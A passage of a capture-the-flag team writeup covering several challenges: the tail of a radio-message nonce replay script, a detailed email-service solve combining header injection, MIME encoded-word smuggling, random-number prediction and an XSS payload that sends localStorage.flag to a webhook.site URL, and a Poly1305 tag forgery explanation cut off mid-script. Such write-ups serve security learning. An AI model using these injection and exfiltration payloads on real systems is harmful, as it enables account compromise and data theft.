inject_radio_message({"msg_type": "set_addr", "dst": "16", "src":"1", "new_addr": "0"})
a = wait_for_radio_message("secure_data")[-1]
log.info(f"got a = {a.get(ENC)[:16]}")
inject_radio_message(secure_data_ack[2], dst=BOT)
"""
THING
"""
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[3], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 4
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[4], dst=BOT)
# now we're at nonce 5
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[5], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 6
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[6], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 7
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[7], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 8
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[8], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 9
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[9], dst=BOT)
# now we're at nonce 10
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[10], dst=BOT)
# now we're at nonce 11
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[11], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 12
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[12], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 13
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[13], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 14
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[14], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 15
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[15], dst=BOT)
# now we're at nonce 16
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[16], dst=BOT)
# now we're at nonce 17
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[17], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 18
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[18], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 19
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[19], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 20
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[20], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 21
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[21], dst=BOT)
# now we're at nonce 22
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[22], dst=BOT)
# now we're at nonce 23
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[23], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 24
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[24], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 25
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[25], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 26
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[26], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 27
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[27], dst=BOT)
# now we're at nonce 28
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[28], dst=BOT)
# now we're at nonce 29
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[29], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 30
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[30], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 31
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[31], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 32
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[32], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 33
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[33], dst=BOT)
# now we're at nonce 34
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[34], dst=BOT)
# now we're at nonce 35
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[35], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 36
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[36], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 37
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_request[37], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 38
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_ack[38], dst=BOT, msg_type="secure_data_response")
# now we're at nonce 39
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[39], dst=BOT)
# now we're at nonce 40
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[40], dst=BOT)
# now we're at nonce 41
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[41], dst=BOT)
# now we're at nonce 42
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[42], dst=BOT)
# now we're at nonce 43
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[43], dst=BOT)
quit("done")
```
## Secure Email Service
### surveying the challenge
The first thing I (voxal) looked at was how to obtain the flag. The goal was to get the admin to open a signed message with an XSS payload in it.
`email.html`
```js=
if (parsed.html) {
    const signed = await getSigned(msg.data, await rootCert());
    if (signed) {
        const { html } = await parse(signed);
        const shadow = content.attachShadow({ mode: 'closed' });
        shadow.innerHTML = `<style>:host { all: initial }</style>${html}`;
    } else {
        content.style.color = 'red';
        content.innerText = 'invalid signature!';
    }
} else {
    const pre = document.createElement('pre');
    pre.style.overflow = 'auto';
    pre.innerText = parsed.text;
    content.appendChild(pre);
}
```
If the email both contained HTML and was signed, the page would embed that HTML, giving us XSS.
We first looked at the WASM binaries, because another challenge (Pachinko Revisited) involved reverse engineering a WASM binary. We quickly realized that 1) the OpenSSL binary was basically just the CLI tool, so that wasn't vulnerable, and 2) the parser was based on a Rust crate called [mail-parser](https://lib.rs/crates/mail-parser) (obtained by running strings on the binary).
Next we looked at whether it was possible to somehow forge the signature, or to solve the challenge some other way through cryptography. We quickly abandoned this, both because it would involve finding a vulnerability in `openssl` and because I'm quite familiar with the authors' challenges and doubted that they would make this a crypto challenge.
I had a revelation when looking at the javascript of `reply.html`:
```js=
import { email, requireLogin, send } from './src/api.js'
import { parse } from './src/email.js'
await requireLogin();
const id = new URL(window.location.href).searchParams.get('id');
if (!/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/.test(id)) {
  alert('invalid id');
  location.href = '/inbox.html';
}
const parsed = await parse((await email(id)).data);
const subject = `Re: ${parsed.subject}`;
document.getElementById('subject').innerText = subject;
document.getElementById('reply').onsubmit = async e => {
  e.preventDefault();
  const body = document.querySelector('[name=body]').value;
  try {
    await send(parsed.from, subject, body); // this line
  } catch(e) {
    alert(e);
    return;
  }
  alert('sent!');
  location.href = '/inbox.html';
}
```
What I realized was that the reply is sent to `parsed.from`, taken from the parsed email. If we could somehow control that header, we could force the admin bot to send a signed email to itself. Since signed messages get embedded, controlling the body of that email would give us XSS.
To control the body, we first needed to predict the boundary that Python generates for the multipart message, so I set my teammates HELLOPERSON and smashmaster to work on cracking Python's `random` to predict the boundary.

### smuggling the header
Since this was our attack vector, we started to look at the email generation code.
```py=
def generate_email(
    sender: str,
    recipient: str,
    subject: str,
    content: str,
    html: bool = False,
    sign: bool = False,
    cert: str = '',
    key: str = '',
) -> str:
    msg = MIMEMultipart()
    msg['From'] = sender
    msg['To'] = recipient
    msg['Subject'] = subject
    msg.attach(MIMEText(content))
    if html:
        msg.attach(MIMEText(content, 'html'))
    if sign:
        return smail.sign_message(msg, key.encode(), cert.encode()).as_string()
    return msg.as_string()
```
We copied the logic into a solve script and tried spoofing a `From` header in the `Subject` field:
```py=
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = """ABC
From: admin@ses
"""
msg.attach(MIMEText("text"))
print(msg.as_string())
```
Run:
```
Traceback (most recent call last):
File "/home/voxal/code/ctf/pico-2025/secure-email-service/tester.py", line 13, in <module>
print(msg.as_string())
~~~~~~~~~~~~~^^
...
File "/usr/lib/python3.13/email/header.py", line 385, in encode
raise HeaderParseError("header value appears to contain "
"an embedded header: {!r}".format(value))
email.errors.HeaderParseError: header value appears to contain an embedded header: 'ABC\nFrom: admin@ses'
```
Hmm nope, looks like there's some logic checking for the exact thing I'm doing. Although the `README` of `mail-parser` does say
> In general, this library abides by the Postel's law or Robustness Principle which states that an implementation must be conservative in its sending behavior and liberal in its receiving behavior. This means that mail-parser will make a best effort to parse non-conformant e-mail messages as long as these do not deviate too much from the standard.
so we could try some variations of the header and see if the parser is lenient enough to parse the extra `From` header.
Maybe a space after the header name?
```py=
msg['Subject'] = f"""ABC
From : admin@ses
"""
```
gives:
```
email.errors.HeaderWriteError: folded header contains newline: 'Subject: ABC\nFrom : admin@ses\n'
```
Different error, still doesn't work. Maybe a space before the header?
```py=
msg['Subject'] = f"""ABC
 From: admin@ses
"""
```
gives:
```
Content-Type: multipart/mixed; boundary="fixed"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: ABC
From: admin@ses
--fixed
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
text
--fixed--
```
Hey! It produced an email, let's try parsing it. We can write this to `email.eml` and use wasmtime to run the parser (this is the same way the javascript does it).
```bash
❯ wasmtime --dir . frontend/public/wasm/parser.wasm
{
"from": "user@ses",
"html": null,
"subject": "ABC From: admin@ses",
"text": "text",
"to": "admin@ses"
}
```
Nope, the from field is still `"user@ses"`, and the header got folded into the `subject` instead.
We tried more things, but none of them seemed to work. We were stuck until a teammate reminded me that I was on Python 3.13 while the challenge was running Python 3.11.
I tried a space after the header name again (because we had tested it, and the parser would accept it) and well...
```py=
msg['Subject'] = f"""ABC
From : admin@ses
"""
```
gives:
```
Content-Type: multipart/mixed; boundary="fixed"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: ABC
From : admin@ses
--fixed
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
text
--fixed--
```
Haha.. It worked! And the parser treats it as a new header as well!
```bash
❯ wasmtime --dir . frontend/public/wasm/parser.wasm
{
"from": "admin@ses",
"html": null,
"subject": "ABC",
"text": "text",
"to": "admin@ses"
}
```
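The trial and error above can be wrapped in a small harness. This is a minimal sketch, not the script we actually used: `try_subject` and `candidates` are names made up for illustration, and which variants get rejected depends on the local Python version, so no output is shown.

```python
from email.errors import MessageError
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText


def try_subject(subject: str) -> str:
    """Build the same kind of message as generate_email and report the outcome."""
    msg = MIMEMultipart(boundary="fixed")
    msg["From"] = "user@ses"
    msg["To"] = "admin@ses"
    msg["Subject"] = subject
    msg.attach(MIMEText("text"))
    try:
        return msg.as_string()
    except (MessageError, ValueError) as exc:
        # HeaderParseError and HeaderWriteError both derive from MessageError
        return f"rejected: {type(exc).__name__}: {exc}"


# hypothetical labels for the three variants tried in this section
candidates = {
    "plain": "ABC\nFrom: admin@ses\n",
    "space after name": "ABC\nFrom : admin@ses\n",
    "space before name": "ABC\n From: admin@ses\n",
}
results = {label: try_subject(subject) for label, subject in candidates.items()}
for label, outcome in results.items():
    print(f"--- {label} ---\n{outcome}")
```

Running it under both 3.11 and 3.13 would have surfaced the version difference much earlier.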
### controlling the body
Next we needed a way to control the body of the reply email. Again, the only field we had control over was the subject. So it should be as easy as adding a `\n\n` to the `Subject` header to get control of the body, right?
```py=
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = """ABC
From : admin@ses

--fixed
xss payload goes here
"""
msg.attach(MIMEText("text"))
print(msg.as_string())
```
gives:
```
Content-Type: multipart/mixed; boundary="fixed"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: ABC
From : admin@ses
--fixed
xss payload goes here
--fixed
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
text
--fixed--
```
At this point I was confusing myself between the initial and reply email, so even if this had worked, the reply wouldn't have been hijacked. I lose track of these things pretty easily. Regardless, it looks like Python strips this as well. What a shame. Let's find a way to bypass it.
We found this [github issue](https://github.com/python/cpython/issues/121650) that seemed to be exactly what we needed. By using MIME encoded words, hopefully we could smuggle 2 newlines into the reply email.
```py=
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = """ABC =?UTF-8?Q?=0A?=--replybound =?UTF-8?Q?=0A?=xss payload goes here
From : admin@ses
"""
eml = open("email.eml", "w")
eml.write(msg.as_string())
eml.close()
sub = subprocess.run("wasmtime --dir . frontend/public/wasm/parser.wasm", shell=True, encoding="UTF-8", capture_output=True)
print(sub.stdout)
print(sub.stderr)
obj = json.loads(sub.stdout)
print("vvvvvvvv REPLY BELOW vvvvvvvv")
print()
rep = MIMEMultipart(boundary="replybound")
rep['From'] = "user@ses"
rep['To'] = obj["from"]
rep['Subject'] = f"Re: {obj['subject']}"
print(rep.as_string())
```
Oh yeah, we updated our script to also print the reply email, so we could confirm that we were able to hijack its body.
Either way, running this gave us:
```
^^^
initial email cut for brevity
---
{
"from": "admin@ses",
"html": null,
"subject": "ABC \n --replybound \n xss payload goes here",
"text": "text",
"to": "admin@ses"
}
vvvvvvvv REPLY BELOW vvvvvvvv
Content-Type: multipart/mixed; boundary="replybound"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: Re: ABC
--replybound
xss payload goes here
--replybound
--replybound--
```
Yeah, I should have expected this. We did manage to smuggle newlines into the reply email though!
(A side note: if you look at the `\n` in the parsed message, you'll see that there are spaces on both sides of it. This annoyed us since it meant we couldn't control reply headers, until we realized we could just encode the entire message.)
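Encoding the entire chunk works because an RFC 2047 encoded word is plain ASCII on the wire and only turns back into raw text, newlines included, once a parser decodes it. A minimal sketch of that round trip: `encode` is the helper from our later scripts, while `decode_words` is a hypothetical stand-in for what a lenient parser does (it only handles UTF-8 `B` words and is not mail-parser's actual logic).

```python
import base64
import re


def encode(text: str) -> str:
    """Wrap text in a single base64 encoded word."""
    return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?="


def decode_words(value: str) -> str:
    """Hypothetical minimal decoder: expand every UTF-8 'B' encoded word."""
    return re.sub(
        r"=\?UTF-8\?B\?([A-Za-z0-9+/=]*)\?=",
        lambda m: base64.b64decode(m.group(1)).decode(),
        value,
    )


wire = "ABC" + encode("\nFrom : admin@ses")
print(repr(wire))                # no raw newline on the wire
print(repr(decode_words(wire)))  # newline is back after decoding
```

Since the whole chunk is one encoded word, there is no whitespace between words for the decoder to sprinkle around our newlines.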
Anyways, we spent quite a while banging our heads trying to figure out how to get 2 newlines without Python stripping them out.
We gave up on this approach after looking at the source code:
```py=
for line in lines[1:]:
    formatter.newline()
    if charset.header_encoding is not None:
        formatter.feed(self._continuation_ws, ' ' + line.lstrip(),
                       charset)
    else:
        sline = line.lstrip()
        fws = line[:len(line)-len(sline)]
        formatter.feed(fws, sline, charset)
if len(lines) > 1:
    formatter.newline()
```
This code ensures that there is text in the line before adding **a single new line** (`formatter.newline()`), so there would be no way of smuggling our way into the body.
### a new way forward
I did a second pass of the source code and realized something very suspicious.
```py=
@app.post('/api/send')
async def send(
    user: Annotated[User, Depends(db.request_user)],
    to: Annotated[str, Body()],
    subject: Annotated[str, Body()],
    body: Annotated[str, Body()]
):
    # make sure the email we're sending to is valid
    recipient = await db.get_user(to)
    if len(user.public_key) == 0:
        msg = util.generate_email(
            sender=user.username,
            recipient=recipient.username,
            subject=subject,
            content=body,
        )
    else:
        msg = util.generate_email(
            sender=user.username,
            recipient=recipient.username,
            subject=subject,
            # vvvvvvv
            content=template.render(
                title=subject,
                content=body
            ),
            # ^^^^^^^
            html=True,
            sign=True,
            cert=user.public_key,
            key=user.private_key
        )
    email_id = str(uuid.uuid4())
    await db.send_email(recipient, email_id, msg)
    return email_id
```
Sending an email as a user with a key pair (like the admin) would use the jinja template! This would give us access to the body of the reply.
Removing all the styles and other misc crap in the template, we're left with
```html=
<!DOCTYPE html>
<html>
<body>
<div class="email-container">
<h1>{{ title }}</h1>
<pre>{{ content }}</pre>
</div>
</body>
</html>
```
We have control over the title! We can't just toss an XSS payload at this thing since `{{ }}` output gets escaped, so we'll need to be more creative.
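Escaping only neutralizes HTML metacharacters though. As a rough sketch, using the standard library's `html.escape` as a stand-in for Jinja's autoescaping (an assumption: both escape `&`, `<`, `>` and quotes and leave everything else alone), newlines and boundary-looking lines pass straight through. `BOUNDARY` is just a placeholder here.

```python
import html

# hypothetical title: a fake MIME part followed by a script tag
title = "ABC\n--BOUNDARY\nContent-Type : text/html\n\n<script>alert(1)</script>"

# stand-in for what {{ title }} renders to with autoescape on
rendered = f"<h1>{html.escape(title)}</h1>"
print(rendered)
```

So the tag is dead, but a line that starts with `--` plus the right boundary survives, which is all a MIME parser looks for.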
The idea that formed was to put an encoded chunk in our subject. Once it is decoded in the reply and rendered into the template, the parser would be tricked into treating the subject text inside the template as a new multipart chunk, and so it would parse that chunk as the body of the email.
```py=
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import os
import subprocess
import json
import base64
from jinja2 import Template
template = Template(open('./template.jinja2', 'r').read(), autoescape=True)
def encode(text):
    return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?="
content_type = '\nContent-Type : multipart/mixed; boundary="replybound"'
replybound = ''
# the base64 encoded thingy is our payload, we separate it out for
# our final solve script
payload = '\nSubject : \n--replybound\nContent-Type : text/html\nContent-Transfer-Encoding : base64\n\nPHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+\n--replybound\n'
lb = "\n"
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)}
From : admin@ses
"""
print("vvvv FINAL OUTPUT BELOW")
print(f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)}
From : admin@ses
""")
print("^^^^ FINAL OUTPUT ABOVE")
msg.attach(MIMEText("text"))
print(msg.as_string())
eml = open("email.eml", "w")
eml.write(msg.as_string())
eml.close()
sub = subprocess.run("wasmtime --dir . frontend/public/wasm/parser.wasm", shell=True, encoding="UTF-8", capture_output=True)
print(sub.stdout)
print(sub.stderr)
obj = json.loads(sub.stdout)
print("vvvvvvv SUBJECT BELOW vvvvvv")
print(obj['subject'])
print("vvvvvvvv REPLY BELOW vvvvvvvv")
print()
rep = MIMEMultipart(boundary="replybound")
rep['From'] = "admin@ses"
rep['To'] = obj["from"]
rep['Subject'] = f"Re: {obj['subject']}"
admin_content = '\n\n'.join([
    'We\'ve gotten your message and will respond soon.',
    'Thank you for choosing SES!',
    'Best regards,',
    'The Secure Email Service Team'
])
admin_rendered = template.render(
    title=obj['subject'],
    content=admin_content
)
rep.attach(MIMEText(admin_rendered))
# rep.attach(MIMEText(admin_rendered, 'html'))
print(rep.as_string())
```
Here's what the reply looks like:
```
Content-Type: multipart/mixed; boundary="replybound"
MIME-Version: 1.0
From: admin@ses
To: admin@ses
Subject: Re: ABC
Subject :
--replybound
Content-Type : text/html
Content-Transfer-Encoding : base64
PHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+
--replybound
Content-Type : multipart/mixed; boundary="replybound"
--replybound
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
<!DOCTYPE html>
<html>
<body>
<div class="email-container">
<h1>ABC
Subject :
--replybound
Content-Type : text/html
Content-Transfer-Encoding : base64
PHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+
--replybound
Content-Type : multipart/mixed; boundary="replybound"</h1>
<pre>We've gotten your message and will respond soon.
Thank you for choosing SES!
Best regards,
The Secure Email Service Team</pre>
</div>
</body>
</html>
--replybound--
```
And let's take the reply email and put it into the parser...
```bash
❯ wasmtime --dir . frontend/public/wasm/parser.wasm
{
"from": "admin@ses",
"html": "<script>fetch(\"//webhook.site/1a0df526-09ef-454a-9d53-ceb99e0e1c2f/?\" + localStorage.flag)</script>",
"subject": null,
"text": "<!DOCTYPE html>\n<html>\n<body>\n <div class=\"email-container\">\n <h1>ABC\nSubject :",
"to": "admin@ses"
}
```
Hey would you look at that! We got it!
### we did, in fact, not get it.
After testing this against a local instance, well, let's just say we forgot that the email was signed.
The concept still had merit though, we just needed to adapt it to the format of the signed email. Since any headers we injected were put at the top level of the signed email, we could no longer control the `Content-Type` of the inner email, and thus couldn't change the boundary to what we needed it to be. This meant that we needed to predict the boundary, which was possible through randcracking.
My teammates unvariant and HELLOPERSON wrote the randcracker for me.
Looking at the [cpython source](https://github.com/python/cpython/blob/72e5b25efb580fb1f0fdfade516be90d90822164/Lib/email/generator.py#L387), we can see that the boundary is generated using `random.randrange(sys.maxsize)`. Since `sys.maxsize` is 2^63-1, this should reliably generate 63 'clean' bits from the MT19937 PRNG. Each MT19937 output is 32 bits, so we are missing one bit from every 2 consecutive outputs. That means we need a symbolic mersenne twister cracker (which likely uses z3). Searching around for one, we can find [this](https://github.com/icemonster/symbolic_mersenne_cracker/blob/main/main.py) implementation, which is perfect for our purposes.
To predict the boundary, we first need to collect enough samples to recover the MT19937 state. In theory, this can be done using 624 32-bit outputs, but to be safe, we collected over 1,000 63-bit outputs. Feeding these into the randcracker in the right format (*cough cough `bin` doesn't pad*), we can predict the next outputs of `random.randrange(sys.maxsize)` and thus predict the boundary!
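To make the "one unknown bit" concrete, here is a small sketch of how one 63-bit sample maps onto two MT19937 words on CPython. `split_sample` is a hypothetical helper, and the `?`-for-unknown bit-string format is an assumption about what a symbolic cracker wants as input, so check it against the tool you use. Note the zero padding via `format`, which `bin` would not give you.

```python
import random

MAXSIZE = 2**63 - 1  # sys.maxsize on 64-bit CPython


def split_sample(sample: int):
    """Turn one randrange(MAXSIZE) output into two 32-char bit strings."""
    low = sample & 0xFFFFFFFF  # first MT word, fully known
    high31 = sample >> 32      # top 31 bits of the second MT word
    first = format(low, "032b")
    second = format(high31, "031b") + "?"  # lowest bit was shifted away
    return first, second


# two generators with the same seed, to compare against raw 32-bit outputs
a = random.Random(1234)
b = random.Random(1234)
sample = a.randrange(MAXSIZE)
w0, w1 = b.getrandbits(32), b.getrandbits(32)
first, second = split_sample(sample)
print(first, second)
```

With over 1,000 samples this gives more than 2,000 mostly-known words, comfortably above the 624 needed.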
Alright, now that we were able to predict the boundary, we were ready to rip the exploit.
Our final payload was as follows:
```py=
def encode(text):
    return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?="
boundary = "===============7570496185067173140=="
js_payload = '<img src=x onerror=fetch("https://webhook.site/1a0df526-09ef-454a-9d53-ceb99e0e1c2f/?"+localStorage.flag,{mode:"no-cors"}) />'
encoded_js_payload = base64.b64encode(js_payload.encode()).decode()
content_type = '\nContent-Type : multipart/mixed; boundary="="'
replybound = ''
payload = f'\nSubject : \n--{boundary}\nContent-Type : text/html\nContent-Transfer-Encoding : base64\n\n{encoded_js_payload}\n--{boundary}\n'
lb = "\n"
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)}
From : admin@ses
"""
```
We need the trailing `Content-Type : multipart/mixed; boundary="="` because the chunk we inject carries its own injected `Content-Type : text/html`, and we need to undo that afterwards. Luckily the mail parser was lenient enough to let this boundary through (it doesn't conform to spec at all lol).
Anyways, now that we had our exploit, we sent it to the server, hoping for a response.

Any day now..
...
...
Oh what's that?
```py=
@classmethod
def _make_boundary(cls, text=None):
    # Craft a random boundary. If text is given, ensure that the chosen
    # boundary doesn't appear in the text.
    token = random.randrange(sys.maxsize)
    boundary = ('=' * 15) + (_fmt % token) + '=='
    if text is None:
        return boundary
    b = boundary
    counter = 0
    while True:
        cre = cls._compile_re('^--' + re.escape(b) + '(--)?$', re.MULTILINE)
        if not cre.search(text):
            break
        b = boundary + '.' + str(counter)
        counter += 1
    return b
```
Okay so it turns out that python still really does not like us, and it tries to prevent us from doing this exact thing by checking the body for the pattern `^--{boundary}(--)?$`. But hey, remember how lenient the parser is?
```py=
boundary = "===============7570496185067173140==a"
```
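Why the extra `a` helps: the generator only looks for lines that are exactly `--boundary` or `--boundary--`. A minimal sketch of that check (the `collides` helper is ours, the regex is copied from `_make_boundary` above). That the parser still accepts the suffixed line as a delimiter is what we observed, not something this snippet proves.

```python
import re

predicted = "===============7570496185067173140=="


def collides(boundary: str, text: str) -> bool:
    """Same test as _make_boundary: is the boundary present as a delimiter line?"""
    cre = re.compile("^--" + re.escape(boundary) + "(--)?$", re.MULTILINE)
    return cre.search(text) is not None


exact_body = f"junk\n--{predicted}\nmore junk"
suffixed_body = f"junk\n--{predicted}a\nmore junk"
print(collides(predicted, exact_body))     # exact delimiter line is detected
print(collides(predicted, suffixed_body))  # trailing "a" defeats the $ anchor
```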
And send it off again, and soon enough we get our flag :D
sorry for this writeup being so long, there are so many different things we tried and i wanted to document them all, i pity whoever needs to read this. (you guys did say step by step right?)
## Cha Cha Slide
Opening the source, we can very quickly ascertain that the goal of this challenge is to forge a ChaCha20-Poly1305 tag, given two known messages tagged with the same nonce. Forging the encrypted message itself given known plaintext and identical keystream is quite trivial, so we will not focus on forging this part of the final message.
Having previously played PlaidCTF 2024, I recalled that there was a very similar challenge, [DHCPPP](https://github.com/sajjadium/ctf-archives/blob/main/ctfs/PlaidCTF/2024/DHCPPP/dhcppp.c31987bce7265cdacd3329769acada11b26f8d57cc6a9676e3a6dda3b5c90200.py), with the very similar premise of forging a ChaCha20-Poly1305 message. So, I decided to use a few of the easily available solve scripts online ([1](https://sectt.github.io/writeups/Plaid24/DHCPPP/exploit.py), [2](https://hackmd.io/@tranminhprvt01/PlaidCTF2024)) as a starting point for solving the challenge.
Since the first one appears to be using some specialized technique abusing the fact that the DHCPPP packets were mostly identical, we will be reusing most of the functions/functionality from the second writeup.
Let's try to understand the theory behind the solve. Firstly, we need to understand what, exactly, the data that goes into the Poly1305 authentication is.

This diagram on Wikipedia shows it quite well. There is some "Associated Data" (which is empty for our purposes), which is concatenated with null bytes to pad it to a multiple of 16, then the ciphertext of the ChaCha20, that is then padded to a multiple of 16 bytes with null bytes again, which is then followed by the lengths of the associated data and the ciphertext. The lengths are handled by `struct.pack('<Q', len(data))`, which packs the length into an 8 byte LE format. Note that after this process, the total length of the data should be a multiple of 16.
After wrangling with the inputs to the Poly1305 hash, it's quite simple to find the secret key `r` given two (input, output) pairs with the same key. At the start of the Poly1305 hash, the input is split into blocks that become the coefficients of a polynomial. This polynomial is evaluated at `r` modulo 2^130-5, a secret constant `s` (also derived from the original ChaCha20 keystream) is added, and the low 128 bits of the result are used as the hash.
To recover `r` from two such (input, output) pairs, we can do the following:
1. Subtract the outputs. This cancels out the secret constant.
2. Brute force the truncated bits. There are only 9 values to test, as the truncation changes the difference by `k * 2^128` for some integer `k` with -4 <= k <= 4. Call the real output `c`.
3. Subtract the input polynomials. Call this new polynomial `f`.
4. Find the values where `f(r) = c`. Note that since `r` is restricted in which bits can be 1, we can often identify the only possible candidate for `r`.
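Steps 1 and 2 can be checked on a toy example in plain Python. This sketch picks its own `r` and `s` (made-up values, not from the challenge) and shows that exactly one `k` in `-4..4` makes the tag difference agree with the polynomial difference modulo 2^130-5. Actually solving for an unknown `r` needs root finding over the field, which is what the Sage solve script is for.

```python
P = 2**130 - 5
CLAMP = 0x0ffffffc0ffffffc0ffffffc0fffffff


def poly_eval(data: bytes, r: int) -> int:
    """Evaluate the Poly1305 polynomial of data at r, modulo P."""
    acc = 0
    for i in range(0, len(data), 16):
        # each 16-byte chunk gets a 0x01 byte appended, read little-endian
        block = int.from_bytes(data[i:i + 16] + b"\x01", "little")
        acc = (acc + block) * r % P
    return acc


def poly1305(data: bytes, r: int, s: int) -> int:
    """Add the secret constant and keep the low 128 bits."""
    return (poly_eval(data, r) + s) % 2**128


r = 0x0123456789abcdef0123456789abcdef & CLAMP  # toy key half
s = 0xfedcba9876543210fedcba9876543210          # toy key half
d1, d2 = b"A" * 32, b"B" * 32                   # two inputs under the same key
t1, t2 = poly1305(d1, r, s), poly1305(d2, r, s)

# s cancels in t1 - t2; only the lost multiples of 2^128 remain to be guessed
target = (poly_eval(d1, r) - poly_eval(d2, r)) % P
ks = [k for k in range(-4, 5) if (t1 - t2 + k * 2**128) % P == target]
print(ks)
```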
Now, we can forge the ciphertext using typical stream cipher techniques, and then use the ciphertext and our recovered (r, s) values to forge a Poly1305 tag. Submitting this to the server (making sure that all our variable names are correct), we receive the flag. Solve script is below.
```python=
import struct
from pwn import *
from Crypto.Util.number import *
from sage.all import *
context.log_level = 'critical'
P = 2**130 - 5
p = PolynomialRing(GF(2**130-5), 'x')
x = p.gen()
def pad16(data):
